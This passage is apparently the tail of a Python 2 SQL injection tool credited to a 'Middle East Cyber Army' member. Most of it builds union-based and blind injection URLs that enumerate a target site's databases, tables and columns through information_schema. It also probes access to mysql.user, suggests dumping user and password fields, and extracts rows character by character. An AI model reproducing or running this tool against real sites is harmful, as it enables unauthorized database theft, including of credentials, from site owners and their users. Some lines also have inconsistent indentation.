4994.                 else:
4995.                         match = re.findall("MECA", source);
4996.                 if len(match) > 0:
4997.                         print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
4998.                         print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
4999.                         if arg_blind == "--blind":
5000.                                 table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
5001.                         for column in fuzz_columns:
5002.                                 column = column.rstrip("\n")
5003.                                 if arg_blind == "--blind":
5004.                                         column_URL = table_URL.replace("COLUMN",column)
5005.                                 else:
5006.                                         column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
5007.                                 source = GetThatShit(column_URL)
5008.                                 if arg_blind == "--blind":
5009.                                         match = re.findall(arg_string,source)    
5010.                                 else:
5011.                                         match = re.findall("MECA",source)
5012.                                 if len(match) > 0:
5013.                                         print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
5014.                         print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
5015.  
5016. if mode == "--schema":
5017.    
5018.     if arg_database != "None" and arg_table == "None":
5019.            
5020.         if arg_blind == "--blind":
5021.                
5022.             print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
5023.             count_URL = site+"+and+((SELECT+COUNT(table_name)"
5024.             count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
5025.             line_URL = site+"+and+ascii(substring((SELECT+table_name"
5026.             line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
5027.         else:
5028.             print "[+] Showing Tables & Columns from database \""+arg_database+"\""
5029.             file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
5030.             line_URL = site.replace("MECA","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
5031.             line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
5032.             count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
5033.             count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
5034.             arg_row = "Tables"
5035.         if arg_database != "None" and arg_table != "None":
5036.            
5037.             if arg_blind == "--blind":
5038.                 print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
5039.                 file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
5040.                 count_URL = site+"+and+((SELECT+COUNT(column_name)"
5041.                 count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
5042.                 line_URL = site+"+and+ascii(substring((SELECT+column_name"
5043.                 line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
5044.             else:
5045.                 print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
5046.                 file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
5047.                 line_URL = site.replace("MECA","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
5048.                 line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
5049.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
5050.                 count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
5051.  
5052.  
5053.  
5054.         arg_row = "Columns"
5055.  
5056. elif mode == "--dump":                
5057.     print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
5058.     file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
5059.         print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
5060.         if arg_blind == "--blind":
5061.                 MECA = ""
5062.                 for column in arg_columns:
5063.                         MECA += column+",0x3a,"
5064.                 MECA = MECA.rstrip("0x3a,")
5065.                 count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
5066.                 line_URL = site+"+and+ascii(substring((SELECT+concat("+MECA+")+FROM+"+arg_database+"."+arg_table
5067.         else:
5068.                 for column in arg_columns:
5069.                         MECA += column+",0x1e,"
5070.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
5071.                 line_URL = site.replace("MECA",MECA+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
5072.         if arg_where != "" or arg_orderby != "":
5073.                 if arg_where != "":
5074.                         arg_where = arg_where.split(",")
5075.                         print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
5076.                         arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
5077.                 if arg_orderby != "":
5078.                         arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
5079.                         print "[+] ORDERBY clause:",arg_orderby
5080.                 count_URL += "+"+arg_where
5081.                 line_URL += "+"+arg_where+"+"+arg_orderby
5082.         if version[0] == 4:
5083.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
5084.             line_URL = site.replace("MECA",MECA+"0x1e,0x20)")+"+FROM+"+arg_table
5085.  
5086. elif mode == "--full":
5087.     print "[+] Starting full SQLi information_schema enumeration..."
5088.     line_URL = site.replace("MECA","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
5089.     line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
5090.         count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
5091.         count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
5092.        
5093. elif mode == "--dbs":
5094.     print "[+] Showing all databases current user has access too!"
5095.     file.write("\n[+] Showing all databases current user has access too!")
5096.         if arg_blind == "--blind":
5097.                 count_URL = site+"+and+((SELECT+COUNT(schema_name)"
5098.                 count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
5099.                 line_URL = site+"+and+ascii(substring((SELECT+schema_name"
5100.                 line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
5101.         else:
5102.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
5103.                 count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
5104.                 line_URL = site.replace("MECA","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
5105.                 line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
5106.     arg_row = "Databases"
5107.  
5108. if arg_blind == "--blind":
5109.         count_URL+="))"
5110.         line_URL+="+LIMIT+"
5111. else:
5112.         count_URL += arg_end
5113.         line_URL += "+LIMIT+NUM,1"+arg_end
5114.        
5115. ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it...
5116. if mode == "--info" and arg_blind == "--blind":
5117.         head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
5118.         source = GetThatShit(head_URL)
5119.         match = re.findall(arg_string,source)
5120.         if len(match) >= 1:
5121.                 yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
5122.         else:
5123.                 yesno = "NO"
5124.         print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
5125.         print "\n[+] Showing database version, username@location, and database name!"
5126.     file.write("\n\n[+] Showing database version, username@location, and database name!")
5127.     line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
5128.         row_value = 1
5129.  
5130. if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
5131.         if arg_blind == "--blind":
5132.                 row_value = GuessValue(count_URL)
5133.         else:
5134.                 source = GetThatShit(count_URL)
5135.                 match = re.findall("\x1e\x1e\S+",source)
5136.                 match = match[0][2:].split("\x1e")
5137.                 row_value = match[0]
5138.         print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
5139.  
5140. if arg_blind == "--union":
5141.         if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
5142.                 while int(table_num) != int(row_value):
5143.                         try:
5144.                                 source = GetThatShit(line_URL.replace("NUM",str(num)))
5145.                                 match = re.findall("\x1e\x1e\S+",source)
5146.                                 if len(match) >= 1:
5147.                                         if mode == "--schema" or mode == "--full":
5148.                                                 match = match[0][2:].split("\x1e")
5149.                                                 if cur_db != match[0]:         
5150.                                                         cur_db = match[0]
5151.                                                         if table_num == 0:
5152.                                                                 print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
5153.                                                         else:
5154.                                                                 print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
5155.                                                         print "  [Table] >>> \n  ------------- \n\t[Columns]";file.write("[Table: Columns]\n")
5156.                                                 if cur_table != match[1]:
5157.                                                         print "\n\n "+match[1]+" >>>\n ---------------------"+"\n\t"+match[2],
5158.                                                        
5159.                                                         file.write("\n\n["+str(table_num+1)+"]"+match[1]+" >>>\n ---------------------"+"\n\t"+match[2])
5160.                                                        
5161.                                                         cur_table = match[1]
5162.                                                        
5163.                                                         table_num = int(table_num) + 1
5164.                                                 else:
5165.                                                         sys.stdout.write("\n\t%s" % (match[2]))
5166.                                                         file.write("\n\t"+match[2])
5167.                                                         sys.stdout.flush()
5168.                                        
5169.                                         elif mode == "--dbs":                                        
5170.                                                 match = match[0]
5171.                                                 if table_num == 0:
5172.                                                         print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
5173.                                                 else:
5174.                                                         print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
5175.                                                 table_num+=1
5176.                                        
5177.                                         elif mode == "--dump":
5178.                                                 match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
5179.                                                 if match == []:
5180.                                                         match = ['']
5181.                                                 else:
5182.                                                         match = match[0].strip("\x1e").split("\x1e")
5183.                                                 if arg_rowdisp == 1:
5184.                                                         print '\n\n--------------------'  ;file.write( '\n\n--------------------' )    
5185.                                                         print "  Row  Number "+str(num+1)+" >>>", ;file.write(" Row  Number "+str(num+1)+" :",)
5186.                                                         print '\n--------------------\n\n' ;file.write( '\n--------------------\n\n')    
5187.                                                 else:
5188.                                                         print;file.write("\n")
5189.                                                
5190.                                                 for ddata in match:
5191.                                                         if '>' in ddata  or '<' in ddata :
5192.                                                             match.remove(ddata)
5193.                                                        
5194.                                                 for ddata in match:
5195.                                                         if ddata == '' :
5196.                                                             match.remove(ddata)          
5197.                                                 RebelGhost(match)        
5198.                                                 Gh = 0      
5199.                                                 for ddata in See:
5200.                                                         if ddata == '' :
5201.                                                             See.remove(ddata)        
5202.                                                 while Gh<len(See):      
5203.                                                         print '\t==============================================================='  ;file.write('\n===============================================================\n')      
5204.                                                        
5205.                                                         print '\t    '+arg_columns[Gh]+' >>> '+See[Gh]    ;file.write('  '+arg_columns[Gh]+' >>> '+See[Gh])
5206.                                                        
5207.                                                         print '\t==============================================================='; file.write('\n===============================================================\n')        
5208.                                                        
5209.                                                         sys.stdout.flush()
5210.                                                         Gh = Gh+1
5211.                                                 table_num+=1
5212.                                 else:
5213.                                         if mode == "--dump":
5214.                                                 table_num+=1
5215.                                                 sys.stdout.write("\n[%s] No data" % (num))
5216.                                                 file.write("\n[%s] No data" % (num))
5217.                                         break
5218.                                 num+=1
5219.                         except (KeyboardInterrupt, SystemExit):
5220.                                 raise
5221.                         except:
5222.                                 pass
5223.  
5224.  
5225. if arg_blind == "--blind":
5226.         if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
5227.                 lower_bound = 0
5228.                 upper_bound = 127
5229.                 print
5230.                 for data_row in range(int(num), row_value):
5231.                         sys.stdout.write("[%s]: " % (lim_num))
5232.                         file.write("\n[%s]: " % (lim_num))
5233.                         sys.stdout.flush()
5234.                         value = chr(upper_bound)
5235.                         while value != chr(0):
5236.                                 if mode == "--info":   
5237.                                         Guess_URL = line_URL + str(let_pos)+",1))"
5238.                                 else:
5239.                                         Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
5240.                                 value = chr(GuessValue(Guess_URL))
5241.                                 sys.stdout.write("%s" % (value))
5242.                                 file.write(value)
5243.                                 sys.stdout.flush()
5244.                                 let_pos+=1
5245.                         print
5246.                         lim_num = int(lim_num) + 1
5247.                         let_pos = 1
5248.                         data_row+=1
5249.  
5250.  
5251.  
5252.  
5253. print "\n\n[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
5254. print "[-] Job Done ^_^\n";file.write("\n[-] Job Done ^_^\n")
5255.  
5256.  
5257. print '=============================================================='
5258. print '^_^ Coded By RebelGhost-DX .. Middle East Cyber Army! Team ^_^ '
5259. print '              [-]--- Job Finished --- [-]'
5260. file.close()